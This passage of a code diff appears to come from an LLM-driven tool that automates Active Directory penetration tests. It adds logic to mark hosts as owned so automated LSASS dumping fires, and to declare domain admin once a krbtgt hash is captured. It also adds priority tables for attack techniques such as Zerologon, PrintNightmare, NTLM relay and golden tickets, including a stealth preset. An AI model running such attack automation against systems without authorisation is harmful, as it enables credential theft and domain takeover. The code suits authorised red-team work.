     ///
     /// Sanitizes the credential before storage (strips "Password:" prefix, trailing
-    /// metadata, normalizes domains, rejects noise). When the credential's domain is
-    /// a valid FQDN (contains a dot), it is automatically added to `state.domains`
-    /// (matches Python's `add_credential()` behavior).
+    /// metadata, normalizes domains, rejects noise). The credential's `domain`
+    /// field is stored as-is on the credential, but is NEVER promoted into the
+    /// canonical `state.domains` registry — that registry is reserved for
+    /// authoritative recon (LDAP root DSE, DC enumeration, trust queries) so an
+    /// LLM-supplied typo like `north.sevenkingdomain.com` cannot pollute the
+    /// global view.
     pub async fn publish_credential(
         &self,
         queue: &TaskQueueCore,
@@ -38,37 +41,33 @@ impl SharedState {
             let state = self.inner.read().await;
             state.operation_id.clone()
         };
-        let reader = RedisStateReader::new(operation_id.clone());
+        let reader = RedisStateReader::new(operation_id);
         let mut conn = queue.connection();
         let added = reader.add_credential(&mut conn, &cred).await?;
         if added {
-            // Auto-extract domain from credential (matches Python add_credential)
-            let cred_domain = cred.domain.to_lowercase();
-            if cred_domain.contains('.') {
-                let mut state = self.inner.write().await;
-                if !state.domains.contains(&cred_domain) {
-                    state.domains.push(cred_domain.clone());
-                    let domain_key = format!(
-                        "{}:{}:{}",
-                        state::KEY_PREFIX,
-                        operation_id,
-                        state::KEY_DOMAINS,
-                    );
-                    let _: Result<(), _> =
-                        redis::AsyncCommands::sadd(&mut conn, &domain_key, &cred_domain).await;
-                    let _: Result<(), _> =
-                        redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await;
-                    tracing::info!(
-                        domain = %cred_domain,
-                        username = %cred.username,
-                        "Auto-extracted domain from credential"
-                    );
-                }
-                state.credentials.push(cred);
-            } else {
-                let mut state = self.inner.write().await;
-                state.credentials.push(cred);
+            // Warn (don't promote) when the credential's domain is unknown — this
+            // is how we surface LLM hallucinations without letting them mutate
+            // canonical state.
Use NetExec-artifact-stripped form for the check. + let cred_domain = strip_netexec_artifact(&cred.domain.to_lowercase()).to_string(); + let mut state = self.inner.write().await; + if cred_domain.contains('.') + && !state + .domains + .iter() + .any(|d| d.eq_ignore_ascii_case(&cred_domain)) + && !state + .domain_controllers + .keys() + .any(|d| d.eq_ignore_ascii_case(&cred_domain)) + { + tracing::warn!( + domain = %cred_domain, + username = %cred.username, + source = %cred.source, + "Credential references unknown domain — not promoting to state.domains (authoritative recon required)" + ); } + state.credentials.push(cred); } Ok(added) } @@ -115,7 +114,8 @@ impl SharedState { // First pass: find a sibling whose domain matches a known DC let from_dc = state.hashes.iter().find_map(|h| { if h.parent_id.as_deref() == Some(pid) && !h.domain.is_empty() { - let d = h.domain.to_lowercase(); + let d = strip_netexec_artifact(&h.domain.to_lowercase()) + .to_string(); if state.domain_controllers.contains_key(&d) { return Some(d); } @@ -126,7 +126,10 @@ impl SharedState { from_dc.or_else(|| { state.hashes.iter().find_map(|h| { if h.parent_id.as_deref() == Some(pid) && !h.domain.is_empty() { - Some(h.domain.to_lowercase()) + Some( + strip_netexec_artifact(&h.domain.to_lowercase()) + .to_string(), + ) } else { None } @@ -135,7 +138,7 @@ impl SharedState { }) .unwrap_or_default() } else { - hash_domain.to_lowercase() + strip_netexec_artifact(&hash_domain.to_lowercase()).to_string() }; // Only mark as dominated if the domain is a known DC domain. 
// This prevents false domination claims from misattributed hashes @@ -164,14 +167,33 @@ impl SharedState { // Auto-set domain admin when first krbtgt NTLM hash arrives (matches Python) if !state.has_domain_admin { + let da_domain = krbtgt_domain.clone(); drop(state); let path = Some("secretsdump → krbtgt NTLM hash".to_string()); - if let Err(e) = self.set_domain_admin(queue, path).await { + if let Err(e) = self.set_domain_admin(queue, path.clone()).await { tracing::warn!(err = %e, "Failed to auto-set domain admin from krbtgt hash"); } else { tracing::info!( "🎯 Domain Admin auto-set from krbtgt NTLM hash in publish_hash" ); + // Emit DA timeline event + let techniques = vec!["T1003.006".to_string(), "T1078.002".to_string()]; + let event_id = + format!("evt-da-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "domain_admin", + "description": format!( + "CRITICAL: Domain Admin achieved for {} via {}", + da_domain, + path.as_deref().unwrap_or("krbtgt hash") + ), + "mitre_techniques": techniques, + }); + let _ = self + .persist_timeline_event(queue, &event, &techniques) + .await; } } else { drop(state); @@ -343,15 +365,23 @@ mod tests { } #[tokio::test] - async fn publish_credential_auto_extracts_domain() { + async fn publish_credential_does_not_pollute_state_domains() { + // LLM-supplied domains must never be promoted into the canonical + // `state.domains` registry — otherwise a typo like + // `north.sevenkingdomain.com` corrupts every downstream tick loop. 
let state = SharedState::new("op-1".to_string()); let q = mock_queue(); - let cred = make_cred("alice", "P@ssw0rd!", "contoso.local"); + let cred = make_cred("alice", "P@ssw0rd!", "north.sevenkingdomain.com"); state.publish_credential(&q, cred).await.unwrap(); let s = state.inner.read().await; - assert!(s.domains.contains(&"contoso.local".to_string())); + assert!( + s.domains.is_empty(), + "state.domains must remain untouched by credential ingestion, got {:?}", + s.domains + ); + assert_eq!(s.credentials.len(), 1); } #[tokio::test] diff --git a/ares-cli/src/orchestrator/state/publishing/hosts.rs b/ares-cli/src/orchestrator/state/publishing/hosts.rs index a3923601..bda00427 100644 --- a/ares-cli/src/orchestrator/state/publishing/hosts.rs +++ b/ares-cli/src/orchestrator/state/publishing/hosts.rs @@ -11,7 +11,7 @@ use redis::aio::ConnectionLike; use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueueCore; -use super::is_aws_hostname; +use super::{is_aws_hostname, strip_netexec_artifact}; impl SharedState { /// Add a host to state and Redis. @@ -29,9 +29,11 @@ impl SharedState { queue: &TaskQueueCore, host: Host, ) -> Result { - // Normalize hostname: strip trailing dots and AWS internal names + // Normalize hostname: strip trailing artifacts and AWS internal names. + // NetExec sometimes appends "0." to domain names (e.g. + // "dc01.contoso.local0." → "dc01.contoso.local"). Strip both forms. 
let mut host = host; - host.hostname = host.hostname.trim_end_matches('.').to_lowercase(); + host.hostname = strip_netexec_artifact(&host.hostname).to_lowercase(); if is_aws_hostname(&host.hostname) { host.hostname = String::new(); } @@ -102,7 +104,7 @@ impl SharedState { } let new_is_dc = host.is_dc || host.detect_dc(); let was_dc = existing.is_dc; - let had_hostname = !existing.hostname.is_empty(); + let had_fqdn = existing.hostname.contains('.'); let mut changed = false; if new_is_dc && !existing.is_dc { @@ -114,7 +116,17 @@ impl SharedState { existing.hostname = String::new(); changed = true; } - if !host.hostname.is_empty() && existing.hostname.is_empty() { + // Upgrade short name to FQDN when a better hostname arrives. + // Without this, the short name (e.g. "kingslanding") sticks + // and `register_dc` can't derive a domain from it, which + // forces the ambiguous fallback path and mis-maps DCs. + let upgrade_to_fqdn = host.hostname.contains('.') + && !existing.hostname.contains('.') + && host + .hostname + .to_lowercase() + .starts_with(&format!("{}.", existing.hostname.to_lowercase())); + if (!host.hostname.is_empty() && existing.hostname.is_empty()) || upgrade_to_fqdn { existing.hostname = host.hostname.clone(); changed = true; } @@ -138,11 +150,11 @@ impl SharedState { } // Re-register DC if it just became a DC, or if its hostname - // was just filled in (so we can correct the domain mapping). + // was upgraded to (or first set to) an FQDN — that's when we + // can finally derive the correct domain instead of guessing. 
let is_dc_now = existing.is_dc; - let has_hostname_now = !existing.hostname.is_empty(); - let needs_dc = - (is_dc_now && !was_dc) || (is_dc_now && has_hostname_now && !had_hostname); + let has_fqdn_now = existing.hostname.contains('.'); + let needs_dc = (is_dc_now && !was_dc) || (is_dc_now && has_fqdn_now && !had_fqdn); (needs_dc, true) } else { // No existing host — will be added below @@ -266,14 +278,23 @@ impl SharedState { }; // If we can't derive a domain from the hostname, fall back to the - // target domain already in state. This unblocks automation for DCs - // discovered before their FQDN is resolved. + // sole known domain. This unblocks automation for DCs discovered + // before their FQDN is resolved. + // + // Only fall back when exactly one domain is in state. With ≥2 + // domains, "first" is a guess that mis-maps DCs to the wrong domain + // (e.g. registering a parent DC under the child domain), and that + // bad mapping survives later cleanup — `register_dc` only purges + // stale entries by IP, so a subsequent correct registration with a + // *different* IP can't dislodge the wrong (domain, ip) pair. Skip + // and let the next FQDN-bearing discovery populate the entry. let raw_domain = if raw_domain.is_empty() || raw_domain.contains("compute.internal") || raw_domain.contains("amazonaws.com") { let state = self.inner.read().await; - if let Some(fallback) = state.domains.first().cloned() { + if state.domains.len() == 1 { + let fallback = state.domains[0].clone(); tracing::info!( ip = %host.ip, hostname = %host.hostname, @@ -285,7 +306,8 @@ impl SharedState { tracing::debug!( ip = %host.ip, hostname = %host.hostname, - "Skipping DC registration: no FQDN and no fallback domain in state" + known_domains = state.domains.len(), + "Skipping DC registration: no FQDN and ambiguous fallback domain" ); return Ok(()); } @@ -351,6 +373,74 @@ impl SharedState { Ok(()) } + + /// Mark a host as owned (admin access confirmed). 
+ /// + /// This persists the owned flag to both in-memory state and Redis so + /// that automations like `auto_lsassy_dump` and `credential_expansion` + /// can react to host ownership changes. + pub async fn mark_host_owned( + &self, + queue: &TaskQueueCore, + ip: &str, + ) -> Result<()> { + let (host_json, op_id) = { + let mut state = self.inner.write().await; + let host = state.hosts.iter_mut().find(|h| h.ip == ip); + if let Some(h) = host { + if h.owned { + return Ok(()); // already owned + } + h.owned = true; + tracing::info!(ip = %ip, hostname = %h.hostname, "Host marked as owned"); + let json = serde_json::to_string(h).unwrap_or_default(); + (json, state.operation_id.clone()) + } else { + // Host not yet in state — create a minimal entry so downstream + // automations (lsassy_dump, credential_expansion) can fire. + // This happens when secretsdump succeeds before host discovery. + let new_host = Host { + ip: ip.to_string(), + hostname: ip.to_string(), // will be enriched by later discovery + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: state.domain_controllers.values().any(|dc| dc == ip), + owned: true, + }; + tracing::info!(ip = %ip, "Host not in state — creating owned entry"); + let json = serde_json::to_string(&new_host).unwrap_or_default(); + let op_id = state.operation_id.clone(); + state.hosts.push(new_host); + (json, op_id) + } + }; + + // Persist to Redis + let host_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HOSTS); + let mut conn = queue.connection(); + let entries: Vec = redis::AsyncCommands::lrange(&mut conn, &host_key, 0, -1) + .await + .unwrap_or_default(); + let mut found = false; + for (idx, entry) in entries.iter().enumerate() { + if let Ok(existing) = serde_json::from_str::(entry) { + if existing.ip == ip { + let _: Result<(), _> = + redis::AsyncCommands::lset(&mut conn, &host_key, idx as isize, &host_json) + .await; + found = true; + break; + } + } + } + if !found { + // New host entry — 
append to Redis list + let _: Result<(), _> = + redis::AsyncCommands::rpush(&mut conn, &host_key, &host_json).await; + } + Ok(()) + } } #[cfg(test)] @@ -608,6 +698,31 @@ mod tests { ); } + #[tokio::test] + async fn register_dc_skips_ambiguous_fallback_with_multiple_domains() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + // Two domains in state — fallback would be a guess. + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + s.domains.push("fabrikam.local".to_string()); + } + + // DC discovered with no FQDN — must NOT pick the first domain, + // because that would mis-map (e.g. parent DC under child domain) + // and the bad mapping survives later cleanup. + let host = make_host("192.168.58.1", "", true); + state.register_dc(&q, &host).await.unwrap(); + + let s = state.inner.read().await; + assert!( + s.domain_controllers.is_empty(), + "must skip registration when fallback domain is ambiguous" + ); + } + #[tokio::test] async fn register_dc_three_part_hostname_extracts_full_domain() { // Sanity check the >=3 parts branch with a deeper FQDN to make sure @@ -625,6 +740,46 @@ mod tests { ); } + #[tokio::test] + async fn publish_host_upgrades_short_hostname_to_fqdn_and_reregisters_dc() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + // Pre-populate two domains so the ambiguous fallback would fire + // if FQDN derivation didn't work. + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + s.domains.push("fabrikam.local".to_string()); + } + + // First sighting: short name only — register_dc must skip (ambiguous). + let h1 = make_host("192.168.58.1", "dc01", true); + state.publish_host(&q, h1).await.unwrap(); + { + let s = state.inner.read().await; + assert!(s.domain_controllers.is_empty()); + assert_eq!(s.hosts[0].hostname, "dc01"); + } + + // Second sighting: FQDN. 
Must upgrade hostname AND trigger + // re-registration so the DC lands under the correct domain. + let h2 = make_host("192.168.58.1", "dc01.fabrikam.local", true); + state.publish_host(&q, h2).await.unwrap(); + + let s = state.inner.read().await; + assert_eq!(s.hosts[0].hostname, "dc01.fabrikam.local"); + assert_eq!( + s.domain_controllers.get("fabrikam.local"), + Some(&"192.168.58.1".to_string()), + "DC must register under the domain derived from the upgraded FQDN" + ); + assert!( + !s.domain_controllers.contains_key("contoso.local"), + "must not also register under the wrong (first) domain" + ); + } + #[tokio::test] async fn publish_host_strips_trailing_dot() { let state = SharedState::new("op-1".to_string()); diff --git a/ares-cli/src/orchestrator/state/publishing/mod.rs b/ares-cli/src/orchestrator/state/publishing/mod.rs index 6cba8604..9e653c48 100644 --- a/ares-cli/src/orchestrator/state/publishing/mod.rs +++ b/ares-cli/src/orchestrator/state/publishing/mod.rs @@ -111,6 +111,23 @@ pub(super) fn sanitize_credential( Some(cred) } +/// Strip the trailing "0." artifact that NetExec sometimes appends to domain +/// names (e.g. `dc01.contoso.local0.` → `dc01.contoso.local`, +/// `contoso.local0` → `contoso.local`). +pub(super) fn strip_netexec_artifact(s: &str) -> &str { + let s = s.trim_end_matches('.'); + // "0." already collapsed to "0" after trimming "."; strip if preceded by a label + match s.strip_suffix("0.") { + Some(clean) => clean.trim_end_matches('.'), + None => match s.strip_suffix('0') { + // Avoid stripping a real trailing 0 from e.g. "host10" — + // only strip if the char before the 0 is alphabetic (TLD-like). + Some(clean) if clean.ends_with(|c: char| c.is_ascii_alphabetic()) => clean, + _ => s, + }, + } +} + /// Check if a hostname is an AWS internal PTR name. 
pub(super) fn is_aws_hostname(hostname: &str) -> bool { let lower = hostname.to_lowercase(); @@ -137,6 +154,8 @@ mod tests { } } + // --- sanitize_credential --- + #[test] fn valid_credential_passes_through() { let cred = make_cred("alice", "P@ssw0rd!", "contoso.local"); @@ -269,6 +288,8 @@ mod tests { assert!(sanitize_credential(cred, &HashMap::new()).is_none()); } + // --- is_aws_hostname --- + #[test] fn aws_hostname_detected() { assert!(is_aws_hostname("ip-10-0-0-1.ec2.compute.internal")); @@ -288,4 +309,48 @@ mod tests { fn ip_prefix_without_compute_internal_rejected() { assert!(!is_aws_hostname("ip-missing-suffix.local")); } + + // --- strip_netexec_artifact --- + + #[test] + fn strip_netexec_zero_dot() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local0."), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_zero_no_dot() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local0"), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_preserves_clean_hostname() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local"), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_preserves_numeric_suffix() { + // Must NOT strip the 0 from "host10" or "dc10" + assert_eq!(strip_netexec_artifact("host10"), "host10"); + assert_eq!( + strip_netexec_artifact("dc10.contoso.local"), + "dc10.contoso.local" + ); + } + + #[test] + fn strip_netexec_child_domain() { + assert_eq!( + strip_netexec_artifact("dc02.child.contoso.local0."), + "dc02.child.contoso.local" + ); + } } diff --git a/ares-cli/src/orchestrator/strategy.rs b/ares-cli/src/orchestrator/strategy.rs index 22fb9f6f..347d795f 100644 --- a/ares-cli/src/orchestrator/strategy.rs +++ b/ares-cli/src/orchestrator/strategy.rs @@ -292,45 +292,126 @@ fn fast_weights() -> HashMap { ("adcs_esc8", 5), ("gpo_abuse", 6), ("laps", 4), + ("ntlm_relay", 5), + ("nopac", 4), + ("zerologon", 3), + ("printnightmare", 6), + ("share_coercion", 5), + ("mssql_coercion", 4), + 
("password_policy", 3), + ("gpp_sysvol", 3), + ("ntlmv1_downgrade", 3), + ("ldap_signing", 3), + ("webdav_detection", 4), + ("spooler_check", 3), + ("machine_account_quota", 3), + ("dfs_coercion", 5), + ("petitpotam_unauth", 4), + ("winrm_lateral", 5), + ("group_enumeration", 2), + ("localuser_spray", 4), + ("krbrelayup", 5), + ("searchconnector_coercion", 5), + ("lsassy_dump", 3), + ("rdp_lateral", 5), + ("foreign_group_enum", 3), + ("certipy_auth", 2), + ("sid_enumeration", 3), + ("dns_enum", 3), + ("domain_user_enumeration", 2), + ("pth_spray", 4), + ("certifried", 4), + ("dacl_abuse", 2), + ("smbclient_enum", 4), + ("cross_forest_enum", 3), + ("acl_discovery", 2), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) .collect() } -/// Comprehensive: flat priorities so all techniques get equal attention. +/// Comprehensive: prioritize exploitation breadth over speed-to-DA. +/// +/// With flat priorities (old design), the deferred queue drained FIFO, meaning +/// the credential pipeline (AS-REP → Kerberoast → secretsdump) always won +/// because its conditions were met first. ADCS, delegation, NTLM relay, and +/// other exploitation techniques never got slots before DA terminated the op. +/// +/// This design uses 3 tiers: +/// 1 = high-value exploitation (ADCS, delegation, NTLM relay, ACL abuse) +/// 2 = credential pipeline + lateral movement +/// 3 = recon, enumeration, low-value checks +/// +/// The goal: exploit *everything* discovered, not just the fastest path to DA. 
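The tier semantics described above can be sketched as a drain-order comparison. This is an illustrative stand-in, not the orchestrator's actual scheduler: the heap, the `(technique, tier, seq)` tuples, and `drain_order` are all hypothetical, and only assume that lower tier wins and that ties break FIFO within a tier.

```rust
use std::cmp::Reverse;
use std::collections::BinaryHeap;

// Hypothetical sketch: a deferred queue drained by (tier, arrival order)
// lets Tier-1 exploitation tasks pre-empt the credential pipeline even
// when pipeline tasks became ready first. With the old flat weights,
// arrival order alone decided, so the pipeline always won.
fn drain_order(tasks: &[(&str, u8, u64)]) -> Vec<String> {
    // (technique, tier, seq) — lower tier pops first, then FIFO in-tier.
    let mut heap: BinaryHeap<Reverse<(u8, u64, String)>> = tasks
        .iter()
        .map(|(name, tier, seq)| Reverse((*tier, *seq, name.to_string())))
        .collect();
    let mut out = Vec::new();
    while let Some(Reverse((_, _, name))) = heap.pop() {
        out.push(name);
    }
    out
}
```

With `secretsdump` (tier 2) arriving before `esc1` (tier 1), `esc1` still drains first — which is exactly the starvation fix the tiers are for.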
fn comprehensive_weights() -> HashMap { [ - ("dc_secretsdump", 3), - ("golden_ticket", 3), - ("forest_trust_escalation", 3), - ("child_to_parent", 3), - ("domain_admin", 3), - ("secretsdump", 3), - ("credential_reuse", 3), - ("mssql_access", 3), - ("mssql_linked_server", 3), - ("mssql_impersonation", 3), - ("constrained_delegation", 3), - ("unconstrained_delegation", 3), - ("esc1", 3), - ("esc4", 3), - ("esc8", 3), - ("rbcd", 3), - ("acl_abuse", 3), - ("shadow_credentials", 3), - ("mssql_deep_exploitation", 3), - ("kerberoast", 3), - ("asrep_roast", 3), - ("password_spray", 3), - ("gmsa", 3), - ("low_hanging_fruit", 3), + // --- Tier 1: Exploitation breadth (these were starved before) --- + ("esc1", 1), + ("esc4", 1), + ("esc8", 1), + ("adcs_esc1", 1), + ("adcs_esc4", 1), + ("adcs_esc8", 1), + ("constrained_delegation", 1), + ("unconstrained_delegation", 1), + ("ntlm_relay", 1), + ("rbcd", 1), + ("acl_abuse", 1), + ("dacl_abuse", 1), + ("shadow_credentials", 1), + ("gpo_abuse", 1), + ("nopac", 1), + ("certifried", 1), + ("krbrelayup", 1), + ("printnightmare", 1), + // --- Tier 2: Credential pipeline + lateral + persistence --- + ("dc_secretsdump", 2), + ("golden_ticket", 2), + ("forest_trust_escalation", 2), + ("child_to_parent", 2), + ("domain_admin", 2), + ("secretsdump", 2), + ("credential_reuse", 2), + ("mssql_access", 2), + ("mssql_linked_server", 2), + ("mssql_impersonation", 2), + ("mssql_deep_exploitation", 2), + ("kerberoast", 2), + ("asrep_roast", 2), + ("password_spray", 2), + ("gmsa", 2), + ("laps", 2), + ("low_hanging_fruit", 2), + ("gpp_sysvol", 2), + ("certipy_auth", 2), + ("lsassy_dump", 2), + ("pth_spray", 2), + ("winrm_lateral", 2), + ("rdp_lateral", 2), + ("localuser_spray", 2), + // --- Tier 3: Recon, enumeration, coercion setup --- ("smb_signing_disabled", 3), - ("adcs_esc1", 3), - ("adcs_esc4", 3), - ("adcs_esc8", 3), - ("gpo_abuse", 3), - ("laps", 3), + ("share_coercion", 3), + ("mssql_coercion", 3), + ("password_policy", 3), + 
("ntlmv1_downgrade", 3), + ("ldap_signing", 3), + ("webdav_detection", 3), + ("spooler_check", 3), + ("machine_account_quota", 3), + ("dfs_coercion", 3), + ("petitpotam_unauth", 3), + ("group_enumeration", 3), + ("searchconnector_coercion", 3), + ("foreign_group_enum", 3), + ("sid_enumeration", 3), + ("dns_enum", 3), + ("domain_user_enumeration", 3), + ("smbclient_enum", 3), + ("zerologon", 3), + ("cross_forest_enum", 3), + ("acl_discovery", 2), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) @@ -370,6 +451,39 @@ fn stealth_weights() -> HashMap { ("adcs_esc8", 2), ("gpo_abuse", 3), ("laps", 3), + ("ntlm_relay", 7), + ("nopac", 5), + ("zerologon", 4), + ("printnightmare", 8), + ("share_coercion", 6), + ("mssql_coercion", 5), + ("password_policy", 2), + ("gpp_sysvol", 2), + ("ntlmv1_downgrade", 2), + ("ldap_signing", 2), + ("webdav_detection", 3), + ("spooler_check", 2), + ("machine_account_quota", 2), + ("dfs_coercion", 6), + ("petitpotam_unauth", 5), + ("winrm_lateral", 4), + ("group_enumeration", 2), + ("localuser_spray", 7), + ("krbrelayup", 4), + ("searchconnector_coercion", 6), + ("lsassy_dump", 5), + ("rdp_lateral", 4), + ("foreign_group_enum", 2), + ("certipy_auth", 1), + ("sid_enumeration", 2), + ("dns_enum", 2), + ("domain_user_enumeration", 2), + ("pth_spray", 5), + ("certifried", 3), + ("dacl_abuse", 2), + ("smbclient_enum", 3), + ("cross_forest_enum", 2), + ("acl_discovery", 1), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) @@ -471,11 +585,20 @@ mod tests { } #[test] - fn comprehensive_flat_weights() { + fn comprehensive_tiered_weights() { let s = Strategy::from_preset(StrategyPreset::Comprehensive); - assert_eq!(s.effective_priority("secretsdump"), 3); - assert_eq!(s.effective_priority("esc1"), 3); - assert_eq!(s.effective_priority("acl_abuse"), 3); + // Tier 1: exploitation breadth — highest priority + assert_eq!(s.effective_priority("esc1"), 1); + assert_eq!(s.effective_priority("acl_abuse"), 1); + 
assert_eq!(s.effective_priority("constrained_delegation"), 1); + assert_eq!(s.effective_priority("ntlm_relay"), 1); + // Tier 2: credential pipeline + assert_eq!(s.effective_priority("secretsdump"), 2); + assert_eq!(s.effective_priority("kerberoast"), 2); + assert_eq!(s.effective_priority("golden_ticket"), 2); + // Tier 3: recon/enumeration + assert_eq!(s.effective_priority("group_enumeration"), 3); + assert_eq!(s.effective_priority("dns_enum"), 3); } #[test] @@ -625,7 +748,44 @@ mod tests { #[test] fn new_technique_weights_in_presets() { // Verify that new techniques added in this branch are in all presets - let new_techniques = ["rbcd", "shadow_credentials", "mssql_deep_exploitation"]; + let new_techniques = [ + "rbcd", + "shadow_credentials", + "mssql_deep_exploitation", + "ntlm_relay", + "nopac", + "zerologon", + "printnightmare", + "share_coercion", + "mssql_coercion", + "password_policy", + "gpp_sysvol", + "ntlmv1_downgrade", + "ldap_signing", + "webdav_detection", + "spooler_check", + "machine_account_quota", + "dfs_coercion", + "petitpotam_unauth", + "winrm_lateral", + "group_enumeration", + "localuser_spray", + "krbrelayup", + "searchconnector_coercion", + "lsassy_dump", + "rdp_lateral", + "foreign_group_enum", + "certipy_auth", + "sid_enumeration", + "dns_enum", + "domain_user_enumeration", + "pth_spray", + "certifried", + "dacl_abuse", + "smbclient_enum", + "cross_forest_enum", + "acl_discovery", + ]; for preset in [ StrategyPreset::Fast, StrategyPreset::Comprehensive, @@ -643,20 +803,26 @@ mod tests { } #[test] - fn comprehensive_has_equal_weights() { + fn comprehensive_has_tiered_weights() { let s = Strategy::from_preset(StrategyPreset::Comprehensive); - // All comprehensive weights should be 3 + // All weights should be 1, 2, or 3 for (tech, weight) in &s.weights { - assert_eq!(*weight, 3, "Technique {tech} has weight {weight} != 3"); + assert!( + (1..=3).contains(weight), + "Technique {tech} has weight {weight}, expected 1-3" + ); } } #[test] fn 
stealth_penalizes_noisy_techniques() { let s = Strategy::from_preset(StrategyPreset::Stealth); - // Password spray and SMB signing should be most penalized (8) + // Password spray, SMB signing, and PrintNightmare should be most penalized (8) assert_eq!(s.effective_priority("password_spray"), 8); assert_eq!(s.effective_priority("smb_signing_disabled"), 8); + assert_eq!(s.effective_priority("printnightmare"), 8); + // NTLM relay is noisy too (7) + assert_eq!(s.effective_priority("ntlm_relay"), 7); // ADCS/ACL should be most prioritized (1) assert_eq!(s.effective_priority("esc1"), 1); assert_eq!(s.effective_priority("acl_abuse"), 1); diff --git a/ares-cli/src/orchestrator/task_queue.rs b/ares-cli/src/orchestrator/task_queue.rs index 45aba1a1..69e8722e 100644 --- a/ares-cli/src/orchestrator/task_queue.rs +++ b/ares-cli/src/orchestrator/task_queue.rs @@ -81,6 +81,10 @@ pub struct HeartbeatData { pub pod_name: Option, } +// --------------------------------------------------------------------------- +// TaskQueueCore — thin async wrapper around a redis connection. +// --------------------------------------------------------------------------- + /// Async Redis task queue implementing the Ares queue protocol. 
/// /// Generic over connection type to support both production (`ConnectionManager`) diff --git a/ares-cli/src/orchestrator/throttling.rs b/ares-cli/src/orchestrator/throttling.rs index ff4ecee8..392a466a 100644 --- a/ares-cli/src/orchestrator/throttling.rs +++ b/ares-cli/src/orchestrator/throttling.rs @@ -129,7 +129,7 @@ impl Throttler { if llm_count >= max_tasks { let role_count = self.tracker.count_for_role(target_role).await; - let min_per_role = 1_usize; // matches get_min_slots_per_role default + let min_per_role = self.config.max_tasks_per_role; if role_count < min_per_role { info!( llm_count, diff --git a/ares-cli/src/orchestrator/tool_dispatcher/mod.rs b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs index 0e8d4155..686f0b53 100644 --- a/ares-cli/src/orchestrator/tool_dispatcher/mod.rs +++ b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs @@ -80,6 +80,7 @@ const RECON_ROUTED_TOOLS: &[&str] = &[ "smbclient_spider", "check_credman_entries", "check_autologon_registry", + "smb_login_check", "domain_admin_checker", "gmsa_dump_passwords", ]; @@ -98,6 +99,7 @@ const AUTH_BEARING_TOOLS: &[&str] = &[ "smbclient_spider", "check_credman_entries", "check_autologon_registry", + "smb_login_check", "domain_admin_checker", "gmsa_dump_passwords", // impacket tools diff --git a/ares-cli/src/worker/task_loop/result_handler.rs b/ares-cli/src/worker/task_loop/result_handler.rs index a185d89d..c703fd26 100644 --- a/ares-cli/src/worker/task_loop/result_handler.rs +++ b/ares-cli/src/worker/task_loop/result_handler.rs @@ -81,12 +81,12 @@ pub async fn process_task( if let Some(ref usage) = ar.usage { result_payload["usage"] = serde_json::to_value(usage).unwrap_or_default(); } - // Include structured discoveries parsed from tool output + // Include structured discoveries parsed from tool output. + // Must be nested under "discoveries" — the orchestrator's + // process_completed_task extracts from payload["discoveries"]. 
if let Some(ref disc) = ar.discoveries { - if let Some(obj) = disc.as_object() { - for (k, v) in obj { - result_payload[k] = v.clone(); - } + if disc.as_object().is_some_and(|o| !o.is_empty()) { + result_payload["discoveries"] = disc.clone(); } } ( diff --git a/ares-cli/src/worker/tool_executor.rs b/ares-cli/src/worker/tool_executor.rs index 2dcbdf69..35255781 100644 --- a/ares-cli/src/worker/tool_executor.rs +++ b/ares-cli/src/worker/tool_executor.rs @@ -287,23 +287,53 @@ async fn execute_and_respond( Some(discoveries) }; - // Emit discovery spans for observability + // Emit discovery spans for observability. + // For "hosts" discoveries, emit one span per discovered host so each + // gets a clean destination.address (instead of the raw CIDR/multi-IP + // input target). Other discovery types use the extracted target info. if let Some(ref disc) = discoveries { if let Some(obj) = disc.as_object() { for (disc_type, items) in obj { - let count = items.as_array().map(|a| a.len()).unwrap_or(0); - if count > 0 { - let span = trace_discovery( - disc_type, - &request.tool_name, - di.target_user.as_deref(), - None, - di.target_ip.as_deref(), - di.target_fqdn.as_deref(), - dt, - request.operation_id.as_deref(), - ); - let _guard = span.enter(); + if disc_type == "hosts" { + // Per-host spans with individual IPs/hostnames + if let Some(hosts) = items.as_array() { + for host in hosts { + let host_ip = host.get("ip").and_then(|v| v.as_str()); + let host_fqdn = host + .get("hostname") + .and_then(|v| v.as_str()) + .filter(|h| !h.is_empty()); + let host_target_type = host_fqdn + .map(ares_core::telemetry::target::infer_target_type) + .or(dt); + let span = trace_discovery( + disc_type, + &request.tool_name, + di.target_user.as_deref(), + None, + host_ip, + host_fqdn, + host_target_type, + request.operation_id.as_deref(), + ); + let _guard = span.enter(); + } + } + } else { + let count = items.as_array().map(|a| a.len()).unwrap_or(0); + if count > 0 { + let span = trace_discovery( 
